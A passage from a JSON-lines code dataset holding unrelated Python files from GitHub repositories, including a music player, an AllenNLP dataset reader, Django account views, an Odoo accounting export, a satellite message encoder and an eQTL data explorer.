paint')\r\n\r\n","repo_name":"diegoss3d/HundredDaysOfCode","sub_path":"09_Paint_Calculator.py","file_name":"09_Paint_Calculator.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71206346662","text":"import argparse\nimport json\nimport signal\nimport sys\n\nimport yaml\n\nfrom pollect.core.Core import Configuration\nfrom pollect.core.ExecutionScheduler import ExecutionScheduler\nfrom pollect.core.Log import Log\n\n\ndef load_config(config: str):\n if config.endswith('.json'):\n with open(config, 'r') as f:\n return json.load(f)\n if config.endswith('.yml'):\n with open(config, 'r') as f:\n return yaml.safe_load(f)\n\n # File has an unknown or no extension, try all supported formats\n try:\n return load_config(config + '.yml')\n except FileNotFoundError:\n return load_config(config + '.json')\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--version', dest='version', action='store_true',\n help='Prints the current version')\n parser.add_argument('-d', '--debug', dest='debug', action='store_true',\n help='Shortcut for --log-level debug')\n parser.add_argument('--log-level', dest='log_level', default='info',\n choices=['info', 'debug', 'warning', 'error'],\n help=\"Sets the log level, info by default (if --debug isn't set)\")\n parser.add_argument('-c', '--config', dest='config', default='config',\n help='Configuration file which should be read. If no file extension is given '\n 'both (yml and json) will be checked.')\n parser.add_argument('-r', '--dry-run', dest='dry_run', action='store_true',\n help='Prints the probed data to stdout instead of sending it to the writer')\n args = parser.parse_args()\n\n if args.version:\n from pollect import __version__\n print(f'Pollect {__version__}')\n return\n\n log_level = args.log_level\n if args.debug:\n log_level = 'debug'\n Log.setup()\n Log.set_level(log_level)\n\n scheduler = None\n\n def signal_handler(signal, frame):\n nonlocal scheduler\n if scheduler is not None:\n scheduler.stop()\n sys.exit(0)\n\n signal.signal(signal.SIGINT, signal_handler)\n\n raw_config = load_config(args.config)\n config = Configuration(raw_config, args.dry_run)\n scheduler = ExecutionScheduler(config, config.create_executors())\n scheduler.create()\n scheduler.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"davidgiga1993/pollect","sub_path":"pollect/Pollect.py","file_name":"Pollect.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"2453490504","text":"# 猴子吃桃\n'''\n猴子第一天摘下若干个桃子,当即吃了一半,还不瘾,又多吃了一个,第二天早上又将剩下的桃子吃掉一半,又多吃了一个。\n以后每天早上都吃了前一天剩下的一半零一个。到第10天早上想再吃时,见只剩下一个桃子了。求第一天共摘了多少。\n'''\n\n# 循环算法\ncurrent = 1\nfor day in range(9, 0, -1):\n yesterday = (current+1)*2\n current = yesterday\n\nprint(yesterday)\n\n\n# 递归算法\ndef f(n):\n if n == 1:\n return 1\n else:\n return (f(n-1)+1)*2\n\n\nprint(f(10))\n","repo_name":"AlwaysOnline233/cookbook","sub_path":"rookie/7猴子吃桃.py","file_name":"7猴子吃桃.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"10529069566","text":"import pygame\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\n\r\n# Initialize the pygame\r\npygame.init()\r\n\r\n# create the UI\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Music Player\")\r\nroot.geometry(\"300x300\")\r\n\r\n\r\n# function to handle file selection\r\ndef select_file():\r\n file_path = filedialog.askopenfilename()\r\n pygame.mixer.music.load(file_path)\r\n\r\n\r\n# function to handle play button\r\ndef play_music():\r\n pygame.mixer.music.play()\r\n\r\n# function to handle pause button\r\n\r\n\r\ndef pause_music():\r\n pygame.mixer.music.pause()\r\n\r\n# function to handle resume button\r\n\r\n\r\ndef resume_music():\r\n pygame.mixer.music.unpause()\r\n\r\n# function to handle stop button\r\n\r\n\r\ndef stop_music():\r\n pygame.mixer.music.stop()\r\n\r\n\r\n# create the buttons\r\nfile_button = tk.Button(root, text=\"Select File \", command=select_file)\r\nfile_button.pack()\r\n\r\nplay_button = tk.Button(root, text=\"Play\", command=play_music)\r\nplay_button.pack()\r\n\r\npause_button = tk.Button(root, text=\"Pause\", command=pause_music)\r\npause_button.pack()\r\n\r\nresume_button = tk.Button(root, text=\"Resume\", command=resume_music)\r\nresume_button.pack()\r\n\r\nstop_button = tk.Button(root, text=\"Stop\", command=stop_music)\r\nstop_button.pack()\r\n\r\n# run the UI loop\r\nroot.mainloop()\r\n\r\n# clean up pygame\r\npygame.quit()\r\n","repo_name":"sanju50201/Complete-Python-Projects","sub_path":"Set 1/py/music_player.py","file_name":"music_player.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13451983213","text":"def printing(data, languages_count):\n print(\"Results:\")\n for users_dict in data.values():\n for user, score in users_dict.items():\n print(f\"{user} | {score}\")\n\n print(f\"Submissions:\")\n for lang, count in languages_count.items():\n print(f\"{lang} - {count}\")\n\n\ndef creating_data(user_input, languages_count, data):\n username, language, points = user_input.split(\"-\")\n points = int(points)\n if language not in languages_count:\n languages_count[language] = 1\n else:\n languages_count[language] += 1\n if language not in data:\n data[language] = {username: points}\n else:\n if username not in data[language]:\n data[language][username] = points\n else:\n if points > data[language][username]:\n data[language][username] = points\n return data, languages_count\n\n\ndef removing_user(user_input, data):\n username = user_input.split(\"-\")[0]\n for users in data.values():\n if username in users.keys():\n del users[username]\n return data\n\n\nuser_input = input()\ndata = {}\nlanguages_count = {}\nwhile not user_input == \"exam finished\":\n if \"banned\" not in user_input:\n data, languages_count = creating_data(user_input, languages_count, data)\n else:\n data = removing_user(user_input, data)\n\n user_input = input()\n\nprinting(data, languages_count)\n","repo_name":"astankin/Python-Fundamentals","sub_path":"Dictionaries2022/12.SoftUni Exam Results.py","file_name":"12.SoftUni Exam Results.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14067379980","text":"from typing import Dict, Iterable, List\n\nfrom allennlp.data import DatasetReader, Instance\nfrom allennlp.data.fields import SequenceLabelField, TextField\nfrom allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer\nfrom allennlp.data.tokenizers import Token, Tokenizer, WhitespaceTokenizer\n\n\n@DatasetReader.register(\"classification-csv\")\nclass ClassificationCsvReader(DatasetReader):\n def __init__(\n self,\n tokenizer: Tokenizer = None,\n token_indexers: Dict[str, TokenIndexer] = None,\n max_tokens: int = None,\n **kwargs\n ):\n super().__init__(**kwargs)\n self.tokenizer = tokenizer or WhitespaceTokenizer()\n self.token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n self.max_tokens = max_tokens\n\n def text_to_instance(self, text: str, label: str = None) -> Instance:\n tokens = self.tokenizer.tokenize(text)\n if self.max_tokens:\n tokens = tokens[: self.max_tokens]\n text_field = TextField(tokens, self.token_indexers)\n fields = {\"tokens\": text_field}\n if label.strip():\n fields[\"tags\"] = SequenceLabelField(label.split(\" \"), text_field, \"labels\")\n return Instance(fields)\n\n def _read(self, file_path: str) -> Iterable[Instance]:\n with open(file_path, \"r\") as lines:\n for line in lines:\n url, text, sentiment = line.split(\",\")\n yield self.text_to_instance(text, sentiment)","repo_name":"naoki-shigehisa/learning_AllenNLP","sub_path":"work/test/text_classifier/dataset_readers/.ipynb_checkpoints/classification_csv-checkpoint.py","file_name":"classification_csv-checkpoint.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"23657090015","text":"import numpy as np\nimport cv2\n\nclass DenseSIFT(object):\n\tdef __init__(self):\n\t\tself.sift = cv2.xfeatures2d.SIFT_create(nfeatures=1)\n\n\tdef detectAndCompute(self, image, step_size=12, window_size=(10, 10)): # 12 10\n\t\tif window_size is None:\n\t\t\twinH, winW = image.shape[:2]\n\t\t\twindow_size = (winW // 4, winH // 4)\n\n\t\tif image.ndim == 3:\n\t\t\timage = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n\t\tdescriptors = np.array([], dtype=np.float32).reshape(0, 128)\n\t\tkeypoints = []\n\t\tfor cropinfo in self._crop_image(image, step_size, window_size):\n\t\t\t# crops_x, crops_y, crop = cropinfo\n\t\t\tcrop_x = cropinfo[0]\n\t\t\tcrop_y = cropinfo[1]\n\t\t\tcrop = cropinfo[2]\n\t\t\ttmp_keypoints, tmp_descriptor = self.sift.detectAndCompute(crop, None)\n\t\t\t# tmp_keypoints, tmp_descriptor = self._detectAndCompute(crop)\n\t\t\t# tmp_descriptor = self._detectAndCompute(crop)[1]\n\t\t\tif tmp_descriptor is None:\n\t\t\t\tcontinue\n\t\t\tdescriptors = np.vstack([descriptors, tmp_descriptor])\n\n\t\t\tfor i in range(0,len(tmp_keypoints)):\n\t\t\t\ttmp_keypoints[i].pt = [tmp_keypoints[i].pt[0] + crop_y, tmp_keypoints[i].pt[1] + crop_x]\n\n\t\t\tkeypoints = keypoints + tmp_keypoints\n\t\t\t# keypoints.append(tmp_keypoints)\n\t\t\t# keypoints = np.vstack([keypoints, tmp_keypoints])\n\t\treturn keypoints, descriptors\n\n\t# def _detect(self, image):\n\t# \treturn self.sift.detect(image)\n\t#\n\t# def _compute(self, image, kps, eps=1e-7):\n\t# \tkps, descs = self.sift.compute(image, kps)\n\t#\n\t# \tif len(kps) == 0:\n\t# \t\treturn [], None\n\t#\n\t# \tdescs /= (descs.sum(axis=1, keepdims=True) + eps)\n\t# \tdescs = np.sqrt(descs)\n\t# \treturn kps, descs\n\t#\n\t# def _detectAndCompute(self, image):\n\t# \tkps = self._detect(image)\n\t# \treturn self._compute(image, kps)\n\n\tdef _sliding_window(self, image, step_size, window_size):\n\t\tfor y in range(0, image.shape[0], step_size):\n\t\t\tfor x in range(0, image.shape[1], step_size):\n\t\t\t\tyield (x, y, image[y:y + window_size[1], x:x + window_size[0]])\n\n\tdef _crop_image(self, image, step_size, window_size):\n\t\t# crops = []\n\t\t# crops_x = []\n\t\t# crops_y = []\n\t\tcrops_info= []\n\t\twinH, winW = window_size\n\t\tfor (x, y, window) in self._sliding_window(image, step_size=step_size, window_size=(winW, winH)):\n\t\t\tif window.shape[0] != winH or window.shape[1] != winW:\n\t\t\t\tcontinue # 最后不够一个了就跳过\n\n\t\t\tcrops_infotemp =[x,y,np.array(window)]\n\t\t\tcrops_info.append(crops_infotemp)\n\t\t\t# crops.append(window)\n\t\t\t# crops_x.append(x)\n\t\t\t# crops_y.append(y)\n\n\t\treturn crops_info","repo_name":"VictorCSheng/SSET","sub_path":"csutil/densesift.py","file_name":"densesift.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27168944280","text":"from odoo import models, fields, api\nimport base64\nimport logging\nimport time\n\n_logger = logging.getLogger(__name__)\n\n\nclass ConsolidatedJournal(models.TransientModel):\n _name = \"sunat.consolidated_journal\"\n _description = \"Diario Consolidado\"\n\n date_month = fields.Selection(string=\"Mes\", selection=[('01', 'Enero'),\n ('02', 'Febrero'),\n ('03', 'Marzo'),\n ('04', 'Abril'),\n ('05', 'Mayo'),\n ('06', 'Junio'),\n ('07', 'Julio'),\n ('08', 'Agosto'),\n ('09', 'Septiembre'),\n ('10', 'Octubre'),\n ('11', 'Noviembre'),\n ('12', 'Diciembre')])\n date_year = fields.Char(string=\"Año\", size=4)\n\n state = fields.Selection([('choose', 'choose'), ('get', 'get')], default='choose')\n txt_filename = fields.Char('filename', readonly=True)\n txt_binary = fields.Binary('file', readonly=True)\n\n @api.multi\n def generate_file(self):\n dominio = [('move_id.state', 'not like', 'draft'),\n ('month_year_inv', 'like', self.date_month + \"\" + self.date_year)\n ]\n\n # Data\n lst_account_move_line = self.env['account.move.line'].search(dominio)\n\n content_txt = \"\"\n\n # Iterador\n for line in lst_account_move_line:\n # Asiento Contable\n\n date_document = \"\"\n if line.invoice_id.date_document:\n date_document = line.invoice_id.date_document.strftime(\"%d/%m/%Y\")\n\n date_invoice = \"\"\n if line.invoice_id.date_invoice:\n date_invoice = line.invoice_id.date_invoice.strftime(\"%d/%m/%Y\")\n\n date_due = \"\"\n if line.invoice_id.date_due:\n date_due = line.invoice_id.date_due.strftime(\"%d/%m/%Y\")\n\n name = \"\"\n if line.invoice_id.number:\n name = line.invoice_id.number.replace(\"/\", \"\")\n\n concatenado = \"\"\n if line.move_id.name:\n concatenado = line.move_id.name\n if line.invoice_id.name:\n if len(concatenado) > 0:\n concatenado = concatenado + \",\" + line.invoice_id.name\n else:\n concatenado = line.invoice_id.name\n if line.ref:\n if len(concatenado) > 0:\n concatenado = concatenado + \",\" + line.ref\n else:\n concatenado = line.ref\n if line.partner_id.name:\n if len(concatenado) > 0:\n concatenado = concatenado + \",\" + line.partner_id.name\n else:\n concatenado = line.partner_id.name\n\n # 20 -> Tipo\n campo_20 = \"\"\n if line.journal_id.type == \"purchase\" and line.partner_id.person_type != \"03-Sujeto no Domiciliado\":\n campo_20 = \"080200\"\n if line.journal_id.type == \"purchase\" and line.partner_id.person_type == \"03-Sujeto no Domiciliado\":\n campo_20 = \"080100\"\n if line.journal_id.type == \"sale\":\n campo_20 = \"140100\"\n\n # 21 -> Fechas\n campo_operacion = ''\n if line.invoice_id.date_invoice and line.invoice_id.date_document:\n if line.invoice_id.date_invoice.strftime(\"%m%Y\") == line.invoice_id.date_document.strftime(\"%m%Y\"):\n campo_operacion = '1'\n else:\n if line.invoice_id.date_invoice.strftime(\"%Y\") != line.invoice_id.date_document.strftime(\"%Y\"):\n campo_operacion = '9'\n else:\n if int(line.invoice_id.date_invoice.strftime(\"%m\")) == int(\n line.invoice_id.date_document.strftime(\"%m\")) - 1:\n campo_operacion = '0'\n else:\n campo_operacion = '9'\n\n if line.invoice_id:\n txt_line = \"%s00|%s|M%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s\" % (\n line.date.strftime(\"%Y%m\") or '', # -> 01\n name or '', # -> 02\n line.journal_id.id or '', # -> 03\n line.account_id.code or '', # -> 04\n line.company_id.id or '', # -> 05\n line.analytic_account_id.name or '', # -> 06\n line.invoice_id.currency_id.name or '', # -> 07\n line.partner_id.catalog_06_id.code or '', # -> 08|\n line.partner_id.vat or '', # -> 09\n line.invoice_id.document_type_id.number or '', # -> 10\n line.invoice_id.invoice_serie or '', # -> 11\n line.invoice_id.invoice_number or '', # -> 12\n date_invoice or '', # -> 13\n date_due or '', # -> 14\n date_document or '', # -> 15\n concatenado or '', # -> 16\n line.ref or '', # -> 17\n line.debit or 0.0, # -> 18\n line.credit or 0.0, # -> 19\n # line.move_id.name.replace(\"/\", \"\") or '', # -> 20\n campo_20 or '', # -> 20\n campo_operacion or '', # -> 21\n '' or '' # -> 22\n )\n\n # Agregamos la linea al TXT\n content_txt = content_txt + \"\" + txt_line + \"\\r\\n\"\n\n self.write({\n 'state': 'get',\n 'txt_binary': base64.b64encode(content_txt.encode('ISO-8859-1')),\n 'txt_filename': \"LE2060158712320190200050100001111.txt\"\n })\n return {\n 'type': 'ir.actions.act_window',\n 'name': 'Diario Consolidado',\n 'res_model': 'sunat.consolidated_journal',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'target': 'new'\n }\n","repo_name":"kit9/DemoClienteVero","sub_path":"sunat/wizard/consolidated_journal.py","file_name":"consolidated_journal.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5130037816","text":"from typing import Any, Set, Tuple\n\nimport requests\n\n# For a PR to be properly labeled it should have one primary label and one secondary label\n\n# Should specify the type of change\nPRIMARY_LABELS = {\n \"type: new feature\",\n \"type: bug\",\n \"type: enhancement\",\n \"type: misc\",\n}\n\n# Should specify what has been modified\nSECONDARY_LABELS = {\n \"topic: documentation\",\n \"module: datasets\",\n \"module: io\",\n \"module: models\",\n \"module: transforms\",\n \"module: utils\",\n \"ext: api\",\n \"ext: demo\",\n \"ext: docs\",\n \"ext: notebooks\",\n \"ext: references\",\n \"ext: scripts\",\n \"ext: tests\",\n \"topic: build\",\n \"topic: ci\",\n \"topic: docker\",\n}\n\nGH_ORG = \"mindee\"\nGH_REPO = \"doctr\"\n\n\ndef query_repo(cmd: str, *, accept) -> Any:\n response = requests.get(f\"https://api.github.com/repos/{GH_ORG}/{GH_REPO}/{cmd}\", headers=dict(Accept=accept))\n return response.json()\n\n\ndef get_pr_merger_and_labels(pr_number: int) -> Tuple[str, Set[str]]:\n # See https://docs.github.com/en/rest/reference/pulls#get-a-pull-request\n data = query_repo(f\"pulls/{pr_number}\", accept=\"application/vnd.github.v3+json\")\n merger = data.get(\"merged_by\", {}).get(\"login\")\n labels = {label[\"name\"] for label in data[\"labels\"]}\n return merger, labels\n\n\ndef main(args):\n merger, labels = get_pr_merger_and_labels(args.pr)\n is_properly_labeled = bool(PRIMARY_LABELS.intersection(labels) and SECONDARY_LABELS.intersection(labels))\n if isinstance(merger, str) and not is_properly_labeled:\n print(f\"@{merger}\")\n\n\ndef parse_args():\n import argparse\n\n parser = argparse.ArgumentParser(\n description=\"PR label checker\", formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n\n parser.add_argument(\"pr\", type=int, help=\"PR number\")\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n","repo_name":"mindee/doctr","sub_path":".github/verify_pr_labels.py","file_name":"verify_pr_labels.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":1900,"dataset":"github-code","pt":"35"} +{"seq_id":"29105149785","text":"expressao = input(\"\\nDigite a expressão: \").strip()\npilha = []\n\nfor i in expressao:\n \n if i == '(':\n pilha.append(i)\n \n elif i == ')':\n \n if len(pilha) > 0:\n pilha.pop()\n \n else:\n pilha.append(i)\n \nif len(pilha) == 0:\n print(\"Sua expressão está válida!\\n\")\n\nelse:\n print(\"Sua expressão está errada!\\n\")","repo_name":"henrique-tavares/Coisas","sub_path":"Python/Mundo 3/ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"37056658011","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom .forms import UserUpdateForm\nfrom .models import User\nfrom .tasks import send_deactivation_email\n\n\n@login_required\ndef profile(request):\n context = {\n 'title': 'My Profile',\n 'user': request.user,\n 'listings': request.user.get_listings(),\n 'search_profiles': request.user.get_search_profiles(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": '#',\n }\n }\n return render(request, 'users/profile.html', context)\n\n\n@login_required\ndef properties(request):\n user_listings = request.user.get_listings()\n context = {\n 'title': 'My Properties',\n 'active': user_listings.active(),\n 'inactive': user_listings.inactive(),\n 'pending': user_listings.pending(),\n 'has_listings': request.user.has_listings(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Properties\": '#',\n }\n }\n return render(request, 'users/properties.html', context)\n\n\n@login_required\ndef bookmarks(request):\n context = {\n 'title': 'Bookmarked Properties',\n 'bookmarks': request.user.get_bookmarks(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Bookmarked\": '#',\n }\n }\n return render(request, 'users/bookmarks.html', context)\n\n\n@login_required\ndef update(request):\n context = {'title': 'Update Profile',\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Update\": \"#\"\n }\n }\n\n if request.method == 'POST':\n form = UserUpdateForm(request.POST, request.FILES, instance=request.user)\n context.update({'form': form})\n if form.changed_data and form.is_valid():\n form.save()\n messages.info(request, \"Account updated successfully!\")\n else:\n return render(request, 'users/update.html', context)\n return redirect(reverse('accounts:profile'))\n form = UserUpdateForm(instance=request.user)\n context.update({'form': form})\n return render(request, 'users/update.html', context)\n\n\ndef publisher(request, identifier):\n try:\n user = User.objects.prefetch_related('listings__city').get(identifier=identifier)\n except User.DoesNotExist:\n raise Http404(\"User does not exist.\")\n if user == request.user:\n messages.info(request, \"You have been redirected to your own profile.\")\n return redirect(reverse('accounts:profile'))\n\n context = {\n 'title': 'Publisher',\n 'publisher': user,\n 'listings': user.get_listings(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Publisher\": '#',\n }\n\n }\n return render(request, 'users/publisher.html', context)\n\n\n@login_required\ndef deactivate_account(request):\n context = {\n 'title': 'Deactivate Account',\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Deactivate\": \"#\"\n }\n }\n if request.method == 'POST':\n request.user.deactivate()\n send_deactivation_email.delay(request.user.pk)\n logout(request)\n messages.info(request, \"Your account has been disabled! We are sorry to see you go.\")\n return redirect(reverse('index'))\n return render(request, 'users/deactivate.html', context)\n","repo_name":"DonExo/NajdistanDjango3.0","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26648267882","text":"\ndef greeting(name):\n\n print(\"Hello, \" + name)\n\nperson1 = {\n \"name\": \"Rith\",\n \"age\": 21,\n \"country\": \"Cambodia\"\n}\n\n\nclass Person():\n def __init__(self, fname, lname):\n self.firstName = fname\n self.lastName = lname\n \n def displayName(self):\n print(self.firstName, self.lastName)\n\n\nclass Student(Person):\n pass\nstudentName = Student(\"Bo\", \"Rith\")\nstudentName.displayName()\n\nif 50 == 30:\n print(\"True!\")\nelse:\n print(\"False!\")\n\n\nif 5 > 3 and 2 < 5:\n print(\"Good!\")\nelse:\n print(\"Not Good!\")\n\n\nif 4 > 8 or 5 > 0:\n print(\"Yes!\")\nelse:\n print(\"No!\")\n\n\nif not(5 > 1 or 5 < 10):\n print(\"kdkdkd\")\nelse:\n print(\"aaaaa\")\n\n","repo_name":"borith23/test2","sub_path":"myModule.py","file_name":"myModule.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28732756982","text":"class Solution:\n def maxSumSubmatrix(self, matrix: List[List[int]], k: int) -> int:\n def helper(arr, k):\n ans = -float('Inf')\n pre_sum = 0\n dic = [0]\n for item in arr:\n pre_sum += item\n index = bisect.bisect_left(dic, pre_sum-k)\n if index> bits): # no existe bit_lenght() en upython / value.bit_length() > bits:\r\n raise ValueError('No entra ese valor en esa cantidad de bits')\r\n else:\r\n result <<= bits\r\n mask = ((1 << bits) - 1)\r\n result |= (value & mask)\r\n return result\r\n \r\ndef get_analog(type_value, value):\r\n if type_value == 0:\r\n return int.from_bytes((struct.pack('>H',value)), 'big'),analog_types['t0']\r\n elif type_value == 1:\r\n return int.from_bytes((struct.pack('>h',value)), 'big'),analog_types['t1']\r\n elif type_value == 2:\r\n return int.from_bytes((struct.pack('>I',value)), 'big'),analog_types['t2']\r\n elif type_value == 3:\r\n return int.from_bytes((struct.pack('>i',value)), 'big'),analog_types['t3']\r\n elif type_value == 4:\r\n return int.from_bytes((struct.pack('>f',value)), 'big'),analog_types['t4']\r\n else:\r\n raise TypeError\r\n \r\ndef get_bit_length(number):\r\n i = 0\r\n while (number >> i):\r\n i += 1\r\n return i\r\n\r\ndef main():\r\n\r\n trama = Iridium()\r\n Header(trama,[15,15,255,10,0,0,0,1])\r\n #Header(trama,[0,0,1,10])\r\n Message1(trama,2,[1,1])\r\n Message2(trama,4,[1,0,0,0],[0,0,0,1],[4294967295,10,10,10])\r\n Message4(trama,1,[4],[3.1415],1024)\r\n Message4(trama,5,[0,1,2,3,4],[1,-1,1,-1,2.0],1024)\r\n Message6(trama,2,[32,32],[1,1],[1024,1024])\r\n reporte, bitsize = trama.encode()\r\n print(\"{:b}\".format(reporte))\r\n print(bitsize)\r\n report_bytes =reporte.to_bytes(bitsize//8,'big')\r\n print(report_bytes.hex())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"TwinDimensionIOT/TwinDimension-CircuitPython-Examples","sub_path":"lib/kineis/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":8918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"45050385715","text":"import argparse\nimport sys\nfrom os.path import isfile\nimport os\nimport sumstats.api_v1.utils.filesystem_utils as fsutils\nimport sumstats.api_v1.trait.search.access.trait_service as trait_service\nimport sumstats.api_v1.study.search.access.study_service as study_service\nimport sumstats.api_v1.chr.search.access.chromosome_service as chrom_service\nimport sumstats.api_v1.chr.search.chromosome_search as chr_search\nimport sumstats.api_v1.utils.sqlite_client as sql_client\nimport sumstats.api_v1.chr.retriever as cr\nfrom sumstats.api_v1.errors.error_classes import *\nfrom sumstats.api_v1.utils import properties_handler\nfrom sumstats.api_v1.utils.properties_handler import properties\nfrom sumstats.api_v1.common_constants import *\n\n\nclass Explorer:\n def __init__(self, config_properties=None):\n self.properties = properties_handler.get_properties(config_properties)\n self.search_path = properties_handler.get_search_path(self.properties)\n self.study_dir = self.properties.study_dir\n self.trait_dir = self.properties.trait_dir\n self.sqlite_db = self.properties.sqlite_path\n self.trait_file = os.path.join(self.search_path, self.trait_dir, \"file_phen_meta.sqlite\")\n\n def get_list_of_studies(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n studies = sq.get_studies()\n return sorted(list(set(studies)))\n\n def get_list_of_traits(self):\n service = trait_service.TraitService(self.trait_file)\n traits = service.list_traits()\n return traits\n\n def get_list_of_genes(self):\n service = trait_service.TraitService(self.trait_file)\n genes = service.list_genes()\n return genes\n\n def get_list_of_studies_for_trait(self, trait): \n sq = sql_client.sqlClient(self.sqlite_db)\n studies = sq.get_studies_for_trait(trait)\n if studies:\n return sorted(list(set(studies)))\n else:\n raise NotFoundError(\"Trait \" + trait)\n\n def get_list_of_tissues(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n tissues = sq.get_tissue_ontos()\n return sorted(list(set(tissues)))\n\n def get_tissue_ont_dict(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n tissue_ont_dict = sq.get_tissue_ont_dict()\n return tissue_ont_dict\n\n def get_qtl_list(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n qtl_list = sq.get_qtl_list()\n return sorted(list(set(qtl_list)))\n\n def get_studies_of_tissue(self, tissue): \n sq = sql_client.sqlClient(self.sqlite_db)\n studies = sq.get_studies_for_tissue(tissue)\n if studies:\n return sorted(list(set(studies)))\n else:\n raise NotFoundError(\"Tissue \" + tissue)\n\n def get_trait_of_study(self, study_to_find):\n sq = sql_client.sqlClient(self.sqlite_db)\n traits = sq.get_traits_for_study(study_to_find)\n if traits:\n return sorted(list(set(traits)))\n else:\n # study not found\n raise NotFoundError(\"Study \" + study_to_find)\n\n\n def has_trait(self, trait):\n service = trait_service.TraitService(self.trait_file)\n #search = cr.search_all_assocs(trait=trait, start=0, size=0, properties=self.properties)\n #if search[-1] > 0:\n # return True\n if service.has_trait(trait):\n return True\n raise NotFoundError(\"Trait \" + trait)\n \n\n\n def has_gene(self, gene):\n service = trait_service.TraitService(self.trait_file)\n #search = cr.search_all_assocs(gene=gene, start=0, size=0, properties=self.properties)\n #if search[-1] > 0:\n # return True\n if service.has_gene(gene):\n return True\n raise NotFoundError(\"Gene \" + gene)\n\n def check_study(self, study):\n sq = sql_client.sqlClient(self.sqlite_db)\n if sq.check_study(study):\n return True\n raise NotFoundError(\"Study \" + study)\n\n\n\n def get_list_of_chroms(self):\n #return CHROMOSOMES\n return sorted(CHROMOSOMES)\n\n\n def has_chromosome(self, chromosome):\n # raises Not Found Error\n \"\"\"To do: Store the chromosome list as an attribute in the hdf5 file.\"\"\"\n h5files = fsutils.get_h5files_in_dir(self.search_path, self.study_dir)\n #chromosomes = []\n #for h5file in h5files:\n # service = trait_service.StudyService(h5file=h5file)\n # traits.extend(service.list_traits())\n # service.close_file()\n search = cr.search_all_assocs(chromosome=chromosome, start=0, size=0, properties=self.properties)\n if search[-1] > 0:\n print('checked')\n return True\n raise NotFoundError(\"Chromosome \" + str(chromosome))\n\n\ndef get_study_attr(h5file):\n service = study_service.StudyService(h5file=h5file)\n study = service.study\n service.close_file()\n return study\n\n\ndef get_trait_attr(h5file):\n service = study_service.StudyService(h5file=h5file)\n traits = service.traits\n service.close_file()\n return traits\n\n\ndef main():\n\n args = argument_parser(sys.argv[1:]) # pragma: no cover\n explorer = Explorer(properties) # pragma: no cover\n\n if args.molecular_phenotypes: # pragma: no cover\n traits = explorer.get_list_of_traits()\n for trait in traits:\n print(trait)\n\n if args.genes: # pragma: no cover\n genes = explorer.get_list_of_genes()\n for gene in genes:\n print(gene)\n\n if args.molecular_phenotype is not None: # pragma: no cover\n studies = explorer.get_list_of_studies_for_trait(args.molecular_phenotype)\n for study in studies:\n print(study)\n\n if args.chromosomes: # pragma: no cover\n chroms = explorer.get_list_of_chroms()\n for chrom in chroms:\n print(chrom)\n\n if args.studies: # pragma: no cover\n studies = explorer.get_list_of_studies()\n for study in studies:\n print(study)\n\n if args.study is not None: # pragma: no cover\n traits = explorer.get_trait_of_study(args.study)\n if traits is None:\n print(\"The study does not exist: \", args.study)\n else:\n for trait in traits:\n print(trait + \":\" + args.study)\n\n\n if args.tissues: # pragma: no cover\n tissues = 